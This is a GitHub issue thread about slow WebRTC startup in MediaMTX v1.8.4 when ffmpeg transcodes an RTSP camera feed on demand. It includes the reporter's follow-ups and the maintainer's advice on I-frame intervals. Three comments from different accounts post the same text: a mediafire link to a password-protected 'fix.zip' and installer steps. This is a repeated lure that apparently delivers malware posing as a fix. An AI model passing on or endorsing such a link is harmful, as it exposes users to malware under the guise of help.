### ISSUE TITLE
WebRTC started very slow, about 8 ~ 10 seconds.

### ISSUE THREAD

**Issue by Lunewcome** [bluenviron/mediamtx#3691]
## Which version are you using?

v1.8.4

## Which operating system are you using?

- [ ] Linux amd64 standard
- [ ] Linux amd64 Docker
- [ ] Linux arm64 standard
- [ ] Linux arm64 Docker
- [ ] Linux arm7 standard
- [ ] Linux arm7 Docker
- [ ] Linux arm6 standard
- [ ] Linux arm6 Docker
- [ ] Windows amd64 standard
- [x ] Windows amd64 Docker (WSL backend)
- [ ] macOS amd64 standard
- [ ] macOS amd64 Docker
- [ ] Other (please describe)

## Describe the issue
I found it very slow to start display video by WebRTC. I'm using runOnDemand, which I thought was the reason. However even if I open  the same video in another window, it's still slow. And I'm sure ffmpeg was running while I was doing this. 

## Describe how to replicate the issue
1. Add a RTSP stream like this:
   paths:
       mypath:
            runOnDemand: ffmpeg -rtsp_transport tcp -hwaccel cuda -i rtsp://admin:pass@192.168.5.23:554/Streaming/Channels/101 -vf scale=960:-1 -bf 0 -c:v h264_nvenc  -rtsp_transport tcp -f rtsp rtsp://127.0.0.1:8554/mypath
2. Open "http://127.0.0.1:8554/mypath" in browser, with MS edge or Chrome, and press entry.
3. The black screen lasts about 8 ~10 seconds before video appears.

## Did you attach the server logs?

no

## Did you attach a network dump?

yes

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lunewcome** [comment]
[rtc.zip](https://github.com/user-attachments/files/16745862/rtc.zip)

**Comment by Lunewcome** [comment]
I believe this is caused by ffmpeg because transcode is slow: I've tried this:
  paths:
      mypath:
          source: .....
This is very fast, about 1~2s.
But now what confuses me is that ffmpeg is started ~3s after connection is established, why the browse could't play video now immediatly?

**Comment by aler9** [comment]
If you want to decrease startup times, you have to decrease the interval between I-frames. Check FFmpeg documentation for that.
